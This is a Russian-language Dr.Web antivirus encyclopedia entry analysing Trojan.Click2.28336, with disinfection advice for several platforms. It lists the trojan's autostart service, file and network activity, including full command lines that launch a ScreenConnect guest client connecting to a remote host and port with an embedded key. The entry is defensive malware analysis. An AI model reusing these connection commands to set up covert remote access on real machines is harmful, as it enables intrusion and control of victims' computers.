Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Click2.28336

Добавлен в вирусную базу Dr.Web: 2012-07-01

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Создает следующие сервисы:
  • [<HKLM>\SYSTEM\ControlSet001\Services\ScreenConnect Guest Service (e7586fc3629fd414)] 'Start' = '00000002'
Вредоносные функции:
Создает и запускает на исполнение:
  • %PROGRAM_FILES%\ScreenConnect Guest Service (e7586fc3629fd414)\Elsinore.ScreenConnect.GuestService.exe "?y=Guest&h=71.61.209.154&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQAPWgxodcU5CpdRfBoiJ6J0jgnzqTt75IZ9TGHnMeWdfN0DdbDlqQJfnZNYI4kEfHPQwJ%2fFyT0wYWfv%2bVylNlSXcbVOFYKZYv6c2z732%2fsItHdVHzKdxkoHBVwuBMAN31cog6urgEGd1F74DV7hgSewZBbnRT4syRurQw1ACCOqv7GgNWa%2bFrOCLxthgSAs1QzhIzjpIvxQQ7%2biEMYbNj4yWlqCjYEUcGl85w0MXt5nj042qt5KIFtjTQSRLS5UkEIXzezQEdxAdM0o37MkiUtU5LMMCUd5u4LfZ%2bb0PdsXC9tS1n23T6PegH694wtpA2tfxks9DZXcMZRx5KTazBjq&a=ScreenConnect&t=%25COMPUTERNAME%25"
  • %PROGRAM_FILES%\ScreenConnect Guest Service (e7586fc3629fd414)\Elsinore.ScreenConnect.GuestClient.exe "?y=Guest&h=71.61.209.154&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQAPWgxodcU5CpdRfBoiJ6J0jgnzqTt75IZ9TGHnMeWdfN0DdbDlqQJfnZNYI4kEfHPQwJ%2fFyT0wYWfv%2bVylNlSXcbVOFYKZYv6c2z732%2fsItHdVHzKdxkoHBVwuBMAN31cog6urgEGd1F74DV7hgSewZBbnRT4syRurQw1ACCOqv7GgNWa%2bFrOCLxthgSAs1QzhIzjpIvxQQ7%2biEMYbNj4yWlqCjYEUcGl85w0MXt5nj042qt5KIFtjTQSRLS5UkEIXzezQEdxAdM0o37MkiUtU5LMMCUd5u4LfZ%2bb0PdsXC9tS1n23T6PegH694wtpA2tfxks9DZXcMZRx5KTazBjq&a=ScreenConnect&t=%25COMPUTERNAME%25" "-1"
  • %TEMP%\1.tmp\executor.exe
  • %TEMP%\1.tmp\setup.exe
  • %TEMP%\VSD2.tmp\dotnetfx\dotnetchk.exe
Запускает на исполнение:
  • <SYSTEM32>\msiexec.exe /V
  • <SYSTEM32>\msiexec.exe /i setup.msi
Изменения в файловой системе:
Создает следующие файлы:
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\Repository\FS\MAPPING.VER
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\Repository\FS\INDEX.MAP
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\Repository\FS\MAPPING1.MAP
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\Repository\FS\OBJECTS.DATA
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\Repository\FS\MAPPING2.MAP
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP15\drivetable.txt
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\drivetable.txt
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\Repository\$WinMgmt.CFG
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\Repository\FS\INDEX.BTR
  • %WINDIR%\Installer\MSI3.tmp
  • %PROGRAM_FILES%\ScreenConnect Guest Service (e7586fc3629fd414)\Elsinore.ScreenConnect.GuestService.exe
  • %PROGRAM_FILES%\ScreenConnect Guest Service (e7586fc3629fd414)\Elsinore.ScreenConnect.GuestClient.exe
  • %PROGRAM_FILES%\ScreenConnect Guest Service (e7586fc3629fd414)\Elsinore.ScreenConnect.Windows.dll
  • %WINDIR%\Installer\{2135FFA9-0CFD-4DA7-BE86-D014EAE98E9F}\Icon.exe
  • %PROGRAM_FILES%\ScreenConnect Guest Service (e7586fc3629fd414)\Elsinore.ScreenConnect.WindowsClient.dll
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\RestorePointSize
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\Repository\FS\OBJECTS.MAP
  • C:\Config.Msi\259c0.rbs
  • %PROGRAM_FILES%\ScreenConnect Guest Service (e7586fc3629fd414)\Elsinore.ScreenConnect.Core.dll
  • %PROGRAM_FILES%\ScreenConnect Guest Service (e7586fc3629fd414)\Elsinore.ScreenConnect.Client.dll
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\domain.txt
  • %WINDIR%\Installer\259be.msi
  • %TEMP%\24fac.msi
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\rp.log
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_USER_NTUSER_S-1-5-19
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_USER_NTUSER_S-1-5-18
  • %TEMP%\1.tmp\setup.exe
  • %TEMP%\1.tmp\executor.exe
  • %TEMP%\VSD2.tmp\dotnetfx\dotnetchk.exe
  • %TEMP%\1.tmp\setup.msi
  • %TEMP%\VSD2.tmp\install.log
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_USER_USRCLASS_S-1-5-19
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_MACHINE_SOFTWARE
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_MACHINE_SECURITY
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_MACHINE_SYSTEM
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\ComDb.Dat
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_MACHINE_SAM
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_USER_USRCLASS_S-1-5-20
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_USER_NTUSER_S-1-5-20
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_USER_NTUSER_S-1-5-21-2052111302-484763869-725345543-1003
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_USER_.DEFAULT
  • C:\System Volume Information\_restore{E7F0F64C-F7E5-4319-8757-E9A20C1C4E14}\RP16\snapshot\_REGISTRY_USER_USRCLASS_S-1-5-21-2052111302-484763869-725345543-1003
Удаляет следующие файлы:
  • %WINDIR%\Installer\259bf.ipi
  • %TEMP%\24fac.msi
  • %WINDIR%\Installer\259be.msi
  • %WINDIR%\Installer\MSI3.tmp
  • C:\Config.Msi\259c0.rbs
Сетевая активность:
Подключается к:
  • 'wp#d':80
  • '71.##.209.154':8041
TCP:
Запросы HTTP GET:
  • wp#d/wpad.dat
UDP:
  • DNS ASK wp#d
Другое:
Ищет следующие окна:
  • ClassName: 'Shell_TrayWnd' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке